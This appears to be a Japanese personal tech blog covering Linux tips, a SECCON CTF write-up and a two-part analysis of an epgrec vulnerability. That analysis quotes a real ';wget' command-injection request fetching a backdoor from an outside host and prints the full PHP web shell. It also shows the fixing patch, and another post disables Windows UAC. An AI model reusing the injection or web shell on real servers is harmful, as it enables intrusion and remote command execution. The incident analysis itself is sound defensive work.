falconws's blog

ディスクサイズの大きい HDD 等からディスクサイズの小さい SSD 等への Linux クローン

2018-01-04T03:32:00.002+09:00

どうしてもうまく行かない理由が分からないので検証内容のメモ。
500GB 程度の HDD に Linux システムがインストールされている状況で、
256GB 程度の SSD に換装してディスク I/O 性能を上げたい場合の話。
HDD の内容を SSD へクローンして SSD 側からシステムを立ち上げて
元々の HDD はフォーマットしてデータ領域にでもしようとしてなかなかうまく行かない。

前提条件

クローン元は /dev/sda1, /dev/sda2, /dev/sda3

/dev/sda1 に /, /dev/sda2 に /home, /dev/sda3 は Swap
パーティションサイズは大きいが、実際に使用している容量はごくわずかだと仮定

クローン先は特にパーティションは存在しない状態

/dev/sdb として認識していると仮定

手順

クローン元、クローン先をそれぞれパソコンへ接続した状態にする
適当な Linux Live USB とかを起動する（一時作業用 Linux 環境）
クローン先の /dev/sdb へ好みのサイズでパーティションを3つ切る

/dev/sdb1（/）, /dev/sdb2（/home）,/dev/sdb3（Swap）
/dev/sdb1 は Boot Partition なので、boot flag をセットする（fdisk の a コマンド）

partclone でそれぞれのパーティションをクローンする

クローン元のパーティションサイズがクローン先より大きいとエラーになる
partclone -C オプションでサイズチェックを無視してもエラーで死ぬ

そのため、resize2fs でクローン元のファイルシステムをクローン先パーティションより予め小さくしておく

# resize2fs -p /dev/sda1 20G
# resize2fs -p /dev/sda2 90G

# partclone -b -s /dev/sda1 -o /dev/sdb1
# partclone -b -s /dev/sda2 -o /dev/sdb2

パーティションテーブルを除くブートローダをクローンする

# dd if=/dev/sda of=/dev/sdb bs=446 count=1

上記で、/dev/sda の内容が /dev/sdb へ完全にクローンされたはず。

実際にクローン先ディスクのパーティション /dev/sdb1, /dev/sdb2 をそれぞれマウント

して確認してみると、正しくマウントできて中身が見える。

元のシステムでは /etc/fstab のマウントの指定は、すべて UUID ベースでしており

partclone でクローンしたパーティションは例えサイズが異なっていても UUID は同じ値を

保持している為、このまま起動するとどちらのデバイスから上がるか予測できないので

クローン元ディスクを一旦取り外す。

その後、クローン先ディスクのみの状態にしてから起動してみるのだが、

Verifying DMI Pool Data ...

と表示され、全く起動してくれない。

なぜうまく行かないのかさっぱりわからない。

どなたかもし上記の検証内容を見て問題点に心当たりがある方はコメント頂ければ幸いです。

英語キーワード検索用: Clone Larger Disk to Smaller

キーボード（RealForce）を掃除した！

2015-07-05T21:13:00.000+09:00

キーボードを徹底的に掃除した。
キートップを全部はずして、キートップ自体は洗濯機で洗濯。
本体側はエアーダスターで吹き飛ばしつつウェットティッシュや綿棒などで汚れを掃除。

上記画像が掃除前の状態。まだ1年ちょっとぐらいしか使っていないので、外観的には
そこまで汚れがひどいようには見えない。

上記画像が、KeyPuller でキートップを外した直後の状態。。。
き・・・汚い。。。

外したキートップは洗濯ネットに入れて丸洗い↓

本体側はエアーダスター、ウェットティッシュ、綿棒等で掃除↓

完璧には取れなかったが、汚れというよりはキーボード本体側に傷がついていて、その傷が
汚れのように見えているだけのように思う。打鍵が強くて傷ついちゃってるのだろうか。。

本体側を掃除している間にキートップの洗濯が終わったので、タオルの上において乾かし↓

3時間ぐらいおいてみたが、まだ若干濡れている箇所があったので、ティッシュ等も併用
しつつ1個ずつ綺麗に拭いて本体へ装着。

出来上がった本体↓

画像だと最初の状態と比べてあまり違いがわからないかもしれない。。
しかし確実に汚れが見えていたので、新品同様に綺麗になったのは確かである。

フラッシュをたいて撮影しても、ご覧の通り綺麗！↓

SECCON 2014 オンライン予選 Writeup

2014-12-07T19:25:00.000+09:00

2014/12/6 〜 2014/12/7 で、日本最大のCTFイベントであるSECCON 2014 オンライン予選が
開催されました。

私も自宅から参加させて頂きました。

私が解けた問題の1つについて、僭越ながらWriteupを書かせて頂きます。

Choose the number

Genre Programming
Points 100
Question text 
nc number.quals.seccon.jp 31337

sorry fixed URL

こちらのジャンル「Programming」、ポイント「100点」の問題です。

問題文で提示されたソケットに対してncでアクセスすると、下記の応答があります。

$ nc number.quals.seccon.jp 31337
0, 6
The minimum number? 
Timeout, bye.

$ nc number.quals.seccon.jp 31337
5, 1
The minimum number? 5
Wrong, bye.

$ nc number.quals.seccon.jp 31337
9, 8
The minimum number? 8
-3, -2, 6
The maximum number? 6
0, 5, 7, 0
The maximum number? 7
1, 9, 5, 2, -7
The maximum number? 9
9, 7, -9, 7, -9, 3
The maximum number? 9
0, -1, 8, -2, -5, -6, -7
The maximum number? 8
3, 6, 6, -6, -3, 8, 5, -4
The maximum number? 8
-3, -8, -4, 1, 5, 8, 3, 2, -8
The maximum number? 8
98, 63, 3, -37, 35, -85, 47, 44, 73, -94
The maximum number? 98
-99, 56, 9, -36, -70, 97, -8, -76, -46, 14, -39
The minimum number? -99
-49, 17, 14, -62, -48, 31, 59, -57, 60, 9, 18, -11
The minimum number? -57
Wrong, bye.

提示された数列の中から、最大値もしくは最小値を連続で答えさせる問題です。
手動で進めていくと、だんだんタイムアウトが厳しくなるようで、人間の判断、入力速度では
どうしても最後まで進めない感じでした。

ジャンルは「Programming」であることから、自動的に正解値を送り続けるプログラムを組んで
やれば良いのだと想定出来ます。

まずサーバから送られてくる問題の文字列の規則性を考えてみます。
1. 数列と最小値 or 最大値を聞いてくる文言の必ず2行で構成されている
2. 数列は「, 」と、カンマとスペースで区切られている
3. 数列は問題に正解する毎に数が増えていく
4. 最小値 or 最大値を聞いてくる文言は、「minimum」か「maximum」の2つしか無い
5. 最小値 or 最大値を聞いてくる文言の「minimum」か[maximum」は必ず左から2番目の箇所に存在する

以上から、問題文をParseするのは比較的容易な事が分かります。
また、Parseした結果から正解手を導くアルゴリズムも非常に単純な為、比較的解きやすい問題だと思います。

下記のコードを書いて実行することで、keyが手に入りました。


#!/usr/bin/env python
# coding=utf-8

import socket
HOST = 'number.quals.seccon.jp'
PORT = 31337

def main():
    clientsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    clientsock.connect((HOST, PORT))
    while True:
        rcvmsg = clientsock.recv(4096)
        print rcvmsg
        answer = solve(rcvmsg)
        print answer
        clientsock.sendall(answer)
    clientsock.close()


def solve(rcvmsg):
    # parse
    temp = rcvmsg.split("\n")
    str_number_list = temp[0].split(", ")
    max_or_min = temp[1].split(" ")[1]

    number_list = []
    for i in str_number_list:
        number_list.append(int(i))

    if max_or_min == "minimum":
        answer = min(number_list)
    else:
        answer = max(number_list)
    return str(answer)
    
if __name__ == "__main__":
    main()

key: SECCON{Programming is so fun!}

下記、実際にコードを実行した時の実行ログです(長いです)。


2, 8
The minimum number? 
2
5, 5, 0
The minimum number? 
0
-1, 2, 2, -4
The maximum number? 
2
8, 4, 3, -8, 9
The maximum number? 
9
8, -7, 2, -5, 1, 7
The maximum number? 
8
-3, 5, 7, 5, -6, -7, 3
The maximum number? 
7
6, 5, 2, -4, -8, 1, -7, -6
The minimum number? 
-8
4, -3, -5, -9, -5, -1, 4, 7, -9
The minimum number? 
-9
-99, -61, -81, -32, 50, 16, 75, 85, 7, -22
The minimum number? 
-99
82, 30, -28, 10, -23, -92, 27, 16, 14, -92, 78
The minimum number? 
-92
8, 56, -1, -74, -28, 43, -84, -32, -4, -56, 35, -52
The maximum number? 
56
3, 5, 26, -2, -81, 39, -53, 64, 28, 92, -83, -90, 44
The maximum number? 
92
4, 26, -50, 67, -55, 72, -72, -44, -77, -58, 75, 21, 70, 49
The maximum number? 
75
73, 12, -27, 22, 73, -12, 0, -16, 89, 66, 2, -43, -26, -2, -55
The minimum number? 
-55
-72, 5, -47, -80, 45, -3, 73, -95, -85, 58, 89, 22, 61, 60, -75, 27
The minimum number? 
-95
86, -41, -31, -30, 67, 33, 76, -14, 78, 95, 26, 88, -91, -20, 45, 51, 83
The minimum number? 
-91
-68, -47, 60, 85, 1, -17, -92, 94, -33, 47, -64, -76, 87, 21, 84, -8, -86, -14
The maximum number? 
94
18, 50, 9, 41, -26, 40, 39, -83, 7, -96, -45, 41, 47, -87, 28, -30, -70, 92, 8
The minimum number? 
-96
973, -220, -62, -952, -63, -18, 420, 121, 556, 267, -576, -421, 775, 421, 830, -70, 229, 2, 581, 839
The minimum number? 
-952
490, 742, 118, 634, -207, 181, -187, 72, 70, -932, -341, 842, -53, -520, -701, 286, 632, -333, -611, 580, 171
The maximum number? 
842
96, -215, 616, 983, 901, -547, 423, -666, 507, -852, -102, 92, -602, 613, 287, 680, 664, -43, -660, -655, -269, -733
The minimum number? 
-852

・・・略・・・

556459593, 2124483131, 2159881254, -3749776183, -2956358028, -525066711, -181583130, 804390823, 1740090484, -793541476, -771482074, 3981865877, -1781852942, 1733051694, -1229826280, -1252056066, 2302429424, -127597216, 584347400, 3201495296, 3793190324, -3792414033, 1778463825, 3285874942, -2696920906, 2556983581, 4058759995, 98217082, -2611145952, -324523284, -3921510686, 4250415544, -3727489945, -1627669983, -3852674381, 4156209840, 1684566595, -559196578, 331587419, 2164599710, 1250638363, 2661376500, -3009444945, 274000465, 3379372586, 3614523634, 4171421938, 619691208, -611617890, 1790148465, -2489245162, -1565675134, -2352506611, 1996182388, -3737895020, 4166992857, -1384468141, 3603231049, 418250494, -1170383247, -4207411230, -1371190709, -2836728233, -1687718214, -605700096, -3148453710, 1719740456, -1854546036, -3313019035, 3529400825, 3170707133, 60340683, -858105108, 2774783484, 4110192850, 908959548, -166441903, -2216610426, -2582470585, 2612317046, 2524067276, -2097902704, -3952326444, 3689731992, 1755793330, 3127603599, 162955011, 381420595, 1091122758, 4131177934, 971526781, 1344495679, -893926365, -1557417848, 457045675, -2006055280, -2434870581, 2715139040, 704942641, -1699474743, -721176381
The minimum number? 
-4207411230
Congratulations!
The flag is SECCON{Programming is so fun!}

Traceback (most recent call last):
  File "./programming_resolver.py", line 37, in 
    main()
  File "./programming_resolver.py", line 14, in main
    answer = solve(rcvmsg)
  File "./programming_resolver.py", line 28, in solve
    number_list.append(int(i))
ValueError: invalid literal for int() with base 10: 'Congratulations!'

最後にParseに失敗しているのは、サーバから飛んでくる文字列形式が異なるからで、気にしない。

一部 XSS Bonsai という問題で、Windowsが無いと問題に挑戦することすら出来ない問題があり、
私はLinuxしか手元にない為、どんな問題だったのかそれだけ見ることが出来ませんでした・・。
wine でも動作せず・・・。 CTFはプロプライエタリソフトウェアを持っていることが前提なのでしょうか・・・。

負荷の正体はなんなんだ！？定期的に重くなるLinux mint 17 (qiana)

2014-12-03T21:14:00.000+09:00

久しぶりにブログ書きます。

私はLinux mint MATE を日常的に使っているのですが、ここ数ヶ月の間

たまに何も自分では処理をさせているつもりがないのにOS全体がもっさりと

重くなることがありました。

今までずっと原因がわからずにいたのですが、今日判明して嬉しくなってこのエントリを書いていますｗ

状況ですが、OS起動して数分後から突然ストレージアクセスランプが点灯しっぱなしに十数分程

なってしまい、何をするにもIO待ちになってしまいます。

ストレージアクセスランプが光っぱなしなので、IO負荷がかかっていることは容易に分かっていたのですが

じゃあ、どのプロセスがIO負荷をかけているのか？までは掴みきれていませんでした。

今回重い腰を上げて、色々調べてみましたところ、Linuxには「iotop」という素晴らしいコマンドがありました。

このコマンドを実行すると、IO負荷が高いプロセス順にtopコマンドのような出力が得られました。

で、今回判明したプロセスはこれ

「fstrim」

初めて見るコマンドですが、こいつがIOを99％奪い続けていました。

なんだろうかと調べてみると、どうやらUbuntu 14.04ベースのLinuxでは

一週間に1回、自動的にこのコマンドを定期実行するように最初から

スケジューリングされていることが判明しました。

/etc/cron.weekly/fstrim

にしっかり定義されています。

このコマンドは、WindowsでいうところのHDDのデフラグみたいなコマンドらしい。

定期的に実行することでIOパフォーマンスが劣化しないようにしてくれてる模様。

PostgreSQLのvacuum みたいなイメージかなぁ・・・。

Linuxにもこの手のコマンドあるとは知りませんでした。

なんかたまにIO負荷ががくんと十数分上がりっぱなしになって原因がわからず

困っている人の何かしらの参考になれば・・・。

「続編」epgrecの脆弱性を検証する

2014-02-23T13:09:00.000+09:00

前回 epgrecの脆弱性について検証しましたが、しばらく対策について
記述していませんでした。
私の場合、epgrec fork の epgrec UNA というものを使用しており、UNA版での
対策について検討したいと思います。

fork版の開発者から、修正パッチが出ているのでそれを適用します。
http://d.hatena.ne.jp/katauna/20140118/1390017028

パッチ内容を確認します。

$ diff -u /var/www/epgrec/install/step5.php ./step5.php
--- /var/www/epgrec/install/step5.php 2011-10-09 16:57:55.000000000 +0900
+++ ./step5.php 2014-01-18 12:13:04.000000000 +0900
@@ -4,10 +4,6 @@
 
 $settings = Settings::factory();
 
-if( isset( $_GET['script'] ) )
- $epg_rec = $_GET['script'];
-else
- exit();
 if( isset( $_GET['time'] ) )
  $rec_time = $_GET['time'];
 else
@@ -15,8 +11,21 @@
 
 echo 'EPGの初回受信を行います。'.$rec_time.'分程度後に<a href="'.$settings-%3Einstall_url.'">epgrecのトップページ
を開いてください。';
 
-@exec( INSTALL_PATH.$epg_rec.' >/dev/null 2>&1 &' );
-
+if( isset( $_GET['script'] ) ){
+ $epg_rec = $_GET['script'];
+ switch( $epg_rec ){
+  case '/getepg.php':
+  case '/shepherd.php':
+   @exec( INSTALL_PATH.$epg_rec.' >/dev/null 2>&1 &' );
+   break;
+  default:
+   $alert_msg = '不法侵入者による攻撃を受けました。['.$_SERVER['REMOTE_HOST'].'('.$_SERVER['REMOTE_ADDR'].")]\nSCRIPT::[".$epg_rec.']';
+   reclog( $alert_msg, EPGREC_WARN );
+   file_put_contents( INSTALL_PATH.$settings->spool.'/alert.log', date("Y-m-d H:i:s").' '.$alert_msg."\n", FILE_APPEND );
+   syslog( LOG_WARNING, $alert_msg );
+   break;
+ }
+}
 exit();
 
 ?>

これを見ると、URI部分に「?script=;wget〜」のOSコマンドインジェクション攻撃をされた
場合には、処理の実行を中断し攻撃の痕跡をログに残すように変更されています。
scriptパラメータに渡して有効な文字列は「/getepg.php」と「/shepherd.php」のみに
限定されている為、これで攻撃は防げると思います。
そもそもなんですが、このWebアプリはWANに公開することをあまり想定されてないようなので
LAN内限定でアクセス可能に制限し、外から使う時はVPNやssh port forward 等を組み合わせて
利用することをオススメします。そうしないとまた他にも脆弱性が発見される可能性が高いように思います。

# 前回で紹介した攻撃者が不正にアップロードしてきたPHPシェルの検証ももっと深く突っ込んでやりたいですね・・・

epgrecの脆弱性を検証する

2014-01-21T23:58:00.002+09:00

epgrecの脆弱性が巷で話題になっているようなので検証してみたい。

この辺を参照

【速報】torrentアニメのtsファイルの出元が判明

epgrecとは、Linux環境でテレビ番組を録画するソフトウェア、もう少し

詳しく言うといわゆるWebアプリケーションである。

今回問題となったのはこのepgrecの脆弱性、問題となったコードは下記

epgrec/install/step5.php

if( isset( $_GET['script'] ) )
        $epg_rec = $_GET['script'];
else
        exit();
if( isset( $_GET['time'] ) )
        $rec_time = $_GET['time'];
else
        exit();

echo 'EPGの初回受信を行います。'.$rec_time.'分程度後にepgrecのトップページを開いてください。';

@exec( INSTALL_PATH.$epg_rec.' >/dev/null 2>&1 &' );

exit();

このスクリプトに「OSコマンドインジェクション」の脆弱性がある。

@exec( INSTALL_PATH.$epg_rec.' >/dev/null 2>&1 &' );

この部分、外部から「script」というパラメータで受け取った値を
何のチェックもせずに @exec() メソッドの引数の一部として渡してしまっている。
この場合、$epg_rec 変数の中に「;任意のコマンド」と、セミコロンをつけることで
OSコマンドインジェクション攻撃が成立してしまう。

今回の攻撃リクエストは下記

87.181.247.107 - - [12/Jan/2014:17:51:44 +0900] "GET /epgrec/install/step5.php?script=;wget%20-4%20-O%20/home/（ユーザー名）/public_html/epgrec/thumbs/tv.php%20http://gesopls.de/script/epgrec_shell.txt;&time=lolol HTTP/1.1" 200 148 
"-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"

これはつまり、WebブラウザのURL欄に下記のように指定してページを読み込んだことと等しい。

http://被害者のサーバ/epgrec/install/step5.php?script=;wget%20-4%20-O%20/home/（ユーザー名）/public_html/epgrec/thumbs/tv.php%20http://gesopls.de/script/epgrec_shell.txt;&time=lolol

これのURLエンコードされている部分(wgetのあたり)をデコードすると

;wget -4 -O /home/(ユーザ名)/public_html/epgrec/thumbs/tv.php http://gesopls.de/script/epgrec_shell.txt

となる。wgetコマンドはファイルをダウンロードするLinuxコマンド。 wgetの-4オプションは、IPv4のみに接続するオプションで、-Oオプションは保存先のディレクトリや保存ファイル名を指定するオプション。今回はepgrecインストール先のthumbs/ ディレクトリの下に tv.php というファイル名で epgrec_shell.txt をダウンロードさせた事になる。クラッカーが任意のファイルをPHPが動作するディレクトリにアップロードできたというわけ。そんでもって、どんなファイルをアップロードされたのかと言うと、アップロードされたファイルの中身がこちら
epgrec_shell.txt

<?php 
 header('Content-Type: text/html; charset=utf8');
?>
<html>
<head>
<script language="JavaScript">
function hex(d) {
 return d.toString(16);
}
function Encrypt(theText) {
 output = new String;
 Tmp = new String;
 Temp = new Array();
 TextSize = theText.length;
 for (i = 0; i < TextSize; i++) {
  Temp[i] = theText.charCodeAt(i);
 }
 for (i = 0; i < TextSize; i++) {
  Tmp = hex(Temp[i]);
  if (Tmp.length == 1) {
   Tmp = "0" + Tmp;
  }
  output += Tmp;
 }
 document.cmdform.cmd.value=encodeURIComponent(theText);
 document.cmdform.submit();
}
</script>
</head>
<body>
<center>
<form name="encform" onsubmit="return false;">
<textarea name="dcmd" rows="5" cols="50">
</textarea> 
<br/>
<input value="Execute" onclick="Encrypt(this.form.dcmd.value);" type="button"> 
<br/>
</form>
</center>
<form name="cmdform" method="GET" action="">
<input name="cmd" type="hidden" value="">
</form><br/>
<?php 
function hex2str($hex) {  
 for($i=0;$i<strlen($hex);$i+=2) {    
  $str.=chr(hexdec(substr($hex,$i,2)));  
 }  
 return $str;
}

if ($_GET['cmd']) { 
 if($_GET['sjis']==1) 
  $cmd = trim(mb_convert_encoding(urldecode($_GET['cmd']),"SJIS","UTF-8"));
 else 
  $cmd = trim(urldecode($_GET['cmd'])); 

?>
Command : <?php  echo $cmd  ?>
<br/>
<p>
<pre>
<?php 
 $cmd = "(".$cmd;$cmd .= ") 2>&1";
 if (!$_GET['type']) {
  system($cmd);
 } elseif ($_GET['type']==1) {
  passthru($cmd);
 } elseif ($_GET['type']==2) {
  echo (exec($cmd));
 } elseif ($_GET['type']==3) {
  $output = shell_exec($cmd);
  echo $output;
 } 
?>
</pre>
</p>
<?php } ?>

このスクリプトの詳細についてはまた後日検討するとして、結局何かと言うとこれはバックドアだ。テキストエリア欄に任意のコマンドを入力すると、実際にサーバ上でそのコマンドが実行されてしまう。コマンドの実行権限はApache2を動かしているユーザの権限になる。大抵の人が「www-data」になると思われる。下記は私が実際にこのスクリプトを検証してみた結果の画面。Webブラウザを通して任意のコマンドが実行可能になっている。

このようにして、クラッカーは好き勝手に番組を録画し、好き勝手に自分のサーバへ

FTPやscp等を使ってアニメの.tsファイルをアップロードしていたものと思われる。
そして、このバックドアはJavaScriptによって暗号化したり復号化したりしながら処理をしているように見えるが、これは何のためにこんなややこしいことをしているのか現段階ではちょっとわからない。
Apache2のログを難読化するためにやっているのかと想像したのだが、実際にこの状態でログを確認してみると下記のようになる。

192.168.11.30 - - [21/Jan/2014:23:50:52 +0900] "GET /epgrec/thumbs/tv.php?cmd=uname%2520-a HTTP/1.1" 200 843 "http://mint-rec.local/epgrec/thumbs/tv.php" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.77 Safari/537.36"

これではどんな任意のコマンドを実行したのか丸見えなので難読化(？)している意味がない。

一先ず今日はこの辺まで・・・。
海外のクラッカーにクラッキングされないように、きちんと脆弱性を修正したパッチを当てましょう。
このepgrec、意外と脆弱性が他にもまだまだあったりしそうな気がしますね・・・。

Linux mintでVNCを用いてリモート操作する

2013-12-27T19:08:00.000+09:00

Linux mint MATE 32bit 環境でWindowsのVNCっぽくローカルコンソールのGUI
画面と同じ画面をリモートから操作する為の環境を構築する手順を書きます。

まず使用するVNCサーバソフトウェアは「x11vnc」になりますので
このソフトウェアを下記のコマンドでインストールします。

$ sudo apt-get -y install x11vnc

次に、VNC接続するためのパスワードを設定します。
パスワードはバイナリファイルに保存しておきます。
下記コマンドを実行でパスワードを設定します。

$ sudo x11vnc -storepasswd /etc/x11vnc.passwd

パスワードを聞かれるので、打ち込みます。

これでパスワードの設定が出来ました。
次に、OS起動時に自動的にx11vncが立ち上がるように設定します。

$ sudo vi /etc/mdm/Init/Default

このファイルを開くと、スクリプトが表示されると思いますが、
Shift+Gキーを押してスクリプトの一番下に移動します。

exit 0

と書かれてある上の行に、下記をコピペします。

/usr/bin/x11vnc -xkb -auth /var/lib/mdm/:0.Xauth -noxrecord -noxfixes -noxdamage -rfbauth /etc/x11vnc.passwd -shared -forever -bg -rfbport 5900 -cursor arrow -o /var/log/x11vnc.log

これで、自動起動の設定が出来たはずです。
1度OSを再起動しましょう。

再起動が終わったら、手元のVNCクライアントから
ポート番号5900番に接続してみて下さい。
パスワード認証されると思います。先ほど設定したパスワードを入力すると
無事接続できると思います。

Linux mint MATEのパッケージダウンロードを高速化する

2013-11-26T16:02:00.003+09:00

Linux mint はデフォルトで海外のサーバ参照していてダウンロードが遅いので
下記を変更して日本のサーバを参照するようにして高速化することが出来ます。
apt-get等で遅いと感じる場合はやってみると何倍にも速くなると思います。

/etc/apt/sources.list

内の、

deb http://packages.linuxmint.com/ maya main upstream import
↓
deb http://ftp.jaist.ac.jp/pub/Linux/linuxmint/packages/ maya main upstream import


http://archive.ubuntu.com/ubuntu/
↓
http://jp.archive.ubuntu.com/ubuntu/

と書き換えます。
ついでに、Medibuntuプロジェクトが終了したので、下記をコメントアウトします。

# deb http://packages.medibuntu.org/ precise free non-free

以上で、高速な通信によりパッケージのインストールやアップデート、日本語化等が
かなり高速化されます。

Numer0n 作ってみた

2013-11-04T03:48:00.001+09:00

久しぶりに夜な夜なPythonでNumeronを作ってみた。
色々ひどいコードになってしまった。
とりあえず突貫で動けばいいやレベルで作った感じ。

https://github.com/falconws/Numer0n/blob/master/numeron.py

Python 2.7.4 でコンソールから実行して動作確認しています。

絶対なんか色々変なコードな気がする。
突っ込みを入れて欲しいです。
# 実はEmacsの操作の練習も兼ねてたりする。

Proxmox VEを検証してみた

2013-10-18T23:53:00.002+09:00

Proxmox VE
http://pve.proxmox.com/wiki/Main_Page

を検証してみました。
理由は、今VMware ESXiを自宅の仮想化インフラとして使っているのですが
無償版ユーザを切り捨てる感じに動いているようなので、このままESXiを使い続けることは
難しくなるのではないかと移行先を探してのことです。
また、以前より自宅にはLinuxマシンしかないので ESXiの管理コンソールがWindows版しか
無い点に不満を持っていたのも理由です。
(※wineを使ってもvSphere Clientは動作しません)

Proxmox VEとは、Debianベースで構築されたKVMアプライアンスサーバです。
公式サイトから1つの .iso ファイルをダウンロードしてきて、CDに焼いてサーバに
インストールするだけで、Webサーバが立ち上がって他のマシンからhttpでWeb接続して
ESXiのように仮想マシンを作成したり設定したり操作したり出来るというもの。

インストール自体はとても簡単で10分〜15分程度で終わります。
終わったら他のマシンから
https://<サーバのIP>:8006/
へ接続するだけで、すぐに管理画面を利用できます。
※アカウントはユーザIDが root パスワードはインストール時に設定したもの。

色々検証してみたものの、乗り換えには使えないと判断して断念しました。

以下Proxmox VEがダメなところ
1. 日本語の情報、英語の情報ともに少ない。
　　特に日本語の情報なんて皆無と言っていい程に少ない。日本じゃ使われてないのかな？

2. Linux版Google ChromeやFirefox等から仮想マシンのコンソールを開こうとしたら開けない(エラー)。
　　公式フォーラムで聴いてみたところLinuxにバンドルされてるOpenJDK使うんじゃなくてOracleのJava使ってテスト
　　してみたら？とのこと・・。
　　OpenJDKで動かないとか割と面倒。
http://forum.proxmox.com/threads/16397-Can-t-connect-VM-via-Linux-Web-Browser?p=84455#post84455

3. ESXiのようにOSインストール用のisoファイルが大量に置いてあるNFSサーバをマウントする時に不具合がある。
　　NFSサーバマウント先の
　　【NFS root】/template/iso/
　　ディレクトリ直下しかISOファイルを参照しない仕様になっている模様。
　　これでは不便すぎて使えたものじゃない。致命的な仕様上の欠陥はこれ。

4. 全体的になんか不安定
　　コンソールに接続できなかったり微妙に不安定な感じ。

5. WindowsゲストにVirtIO Driverをインストールするのがちょっと煩雑
　　手順が若干面倒。VMware Toolsみたいにお手軽にさらっと入らないものか。

6. spiceプロトコルで接続するにしても不便
　　RDPみたいにお手軽には出来ない。色々面倒なことが多い。

全体的に面倒だったり不安定だったりで乗り換える気にはなれませんでした。
VMware ESXiはWindowsが無いと管理画面が使えない点が最悪ですが、地味に色々便利で扱いやすいです。
何か代替え探さないと仮想化環境難民になってしまう・・・・・・。
XenServer？　いやーオープンソースで仮想化やるなら基盤はKVMでしょ？とか思う今日この頃でした。

シェルスクリプトで拡張子を簡単に取り除く構文

2013-09-18T15:50:00.000+09:00

今まで知らなかったのでメモ。
こんな簡単に拡張子を取り除けるのか・・・・。
今まではわざわざbasenameとか使っていたのに。

for i in *.ts
do
    echo ${i%.ts}.mp4
done

とかやると、拡張子 .ts のファイルから .tsを取り除いて【${i%.ts}の部分】
その後.mp4を付与することが出来る。
これが何の役に立つかって、例で示したコードだと .tsファイルを.mp4へ
エンコードするときとかに役立つ。
今まで結構拡張子を変更したいとき煩雑なコードを書いてた気がするので、これは
かなり楽でスッキリしたコードになるなぁと。

WZR-G108 Buffaloのちょっと古い無線ルータ不安定

2013-08-27T03:38:00.000+09:00

WZR-G108 を実家で長い間使用しているのですが、ちょくちょくルータが応答しなくなり不安定です。

ルータが応答しなくなったら、電源を抜いて強制的に再起動するしか復帰方法がない。
ルータのファームウェアも最新版(Ver 2.41)を用いています。

今日いい加減に嫌気がさして、設定を軽くメモして工場出荷時設定(初期化)に戻しました。
戻した後、メモした内容を元に設定を元に戻していき、不要なNATログ出力を無効にしたりして
ルータの負荷を軽くする感じにチューニングしてみました。
とりあえずこれで初期化したことによる効果を様子見で確認します。

本当は無線暗号方式は AESを使いたいのですが、AESで使っていると2日に1回ぐらいの割合で無線(Wi-Fi)が死に、強制再起動を余儀なくされるので断念して、脆弱なのは承知の上でWEPを使っています。

WEPだと当然非常に不安なので、MACアドレス制限を有効にしてセキュリティを高めてますが、これでも侵入しようと思えば、きっとパケットキャプチャされて通信しているMACアドレスを知られ、
そのMACアドレスに偽装(MAC Address Spoofing)してWEP暗号を破られれば
侵入されちゃうんでしょうね？うーん・・・・。

この問題を考えていて、任天堂DSがWEP暗号しかサポートしてない問題を思い出しました。
この例によらず、昔売られていたハードウェアは開発が止まりファームウェアも更新されなくなるので、こうなってくるとやはり新しいハードウェアに買い替えしかないのでしょうか？

実家に、「Avel Link Player2」というネットワークメディアプレイヤーもあるのですが
これも昔のままファームウェア更新が止まっているので、最新のH.264形式の動画を再生できなかったりして、コーデックを自分で追加することも出来ず困っています。
最新のハードウェア買い替え以外に何か対策がないものか・・・。
最新のハードウェアに買い換えてもいいけど、また年月が過ぎたら古くなって使い物にならなくなるのが目に見えてるので
物理的に壊れてしまうまで使いたい性格の自分としては、なんだかなぁと。
継続的に将来も有効に活用できるハードウェアの買い方をしたいものです。

Windows8を脆弱にして管理者権限を簡単に振りかざす方法

2013-08-07T01:40:00.000+09:00

知り合いに「Windows8でWSH等のスクリプトがエラーで動かないんだけど？」と

相談されました。エラーの原因はスクリプト実行ユーザの権限不足なのですが

そもそもAdministratorsに所属しているのにおかしいな？

Windows7だとコントロールパネルからUAC(User Access Control)を無効にするとか

すれば、XPみたいな感じに使えますが、Windows8ではさらにセキュリティが強化

されており、それだけではまだスクリプトの実行は色々エラーが出る模様。

解決策は、下記を実行して管理者権限を開放する方法。

レジストリエディタで下記を修正。

キー：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System

名前：EnableLUA

データ：0

ただしWindows8のセキュリティ機構を無効化しちゃうので、あまりオススメはしません。
本来ならそのスクリプトを実行する時にだけ権限を昇格させるような方法を模索
※ Linuxで言うところの sudo みたいな・・？？
すべきだと思いますが、とりあえず動かすだけならこれで従来のスクリプトが動いたりします。

スマートフォンをリモコンにしてパソコン内の動画を再生！！

2013-08-07T01:23:00.001+09:00

スマートフォン(Android、 iPhone)をリモコンにして、パソコン内に入っている動画ファイルを
再生できる、まさにパソコンをホームシアターにしてしまう面白いソフトウェアを導入してみました。

その名は「xbmc」。
参考にしたのは下記サイト(Windows版について書かれてますが参考になりました。)
動画をテレビとパソコンで再生「XBMCを使ってみよう」

Linux mintでこれを導入してみた所、大変快適な動画視聴環境が出来上がりました。
実家に構築したのですが、家族が持つAndroid or iPhoneをリモコンに出来るので、新たに
リモコンを買ったりBluetoothやIrDA(赤外線)インタフェースをパソコンに増設したりしなくて良いです。
IPレベルで通信出来るので、同じLANに参加(Wi-Fiネットワークなら普通そうなってる)すればいいだけ。

Android版xbmcのリモコンアプリ
https://market.android.com/details?id=org.xbmc.android.remote

iPhone版xbmcのリモコンアプリ
https://itunes.apple.com/us/app/unofficial-official-xbmc-remote/id520480364?ls=1&mt=8

どちらも無料。

そして、Linux側でやることは
ここを参考に導入、設定するわけですが
ぶっちゃけそんなにたいしたことはしなくて良くて

sudo apt-get install python-software-properties pkg-config
sudo apt-get install software-properties-common
sudo add-apt-repository ppa:team-xbmc/ppa
sudo apt-get update
sudo apt-get install xbmc

とコマンドを実行するだけでインストールできて

$ xbmc

とコマンドを打つだけでシステムがもう立ち上がります。

立ち上がったら、ここを参考に日本語化の設定をします。
その後ここを参考にWebサーバを有効化します。

後は手元のスマフォから接続して操作するだけという簡単仕様。
大画面テレビに接続すればホームシアターが出来上がります。
そうでなくても、普通のモニタで見るにしても、例えばベッドで横になりながら
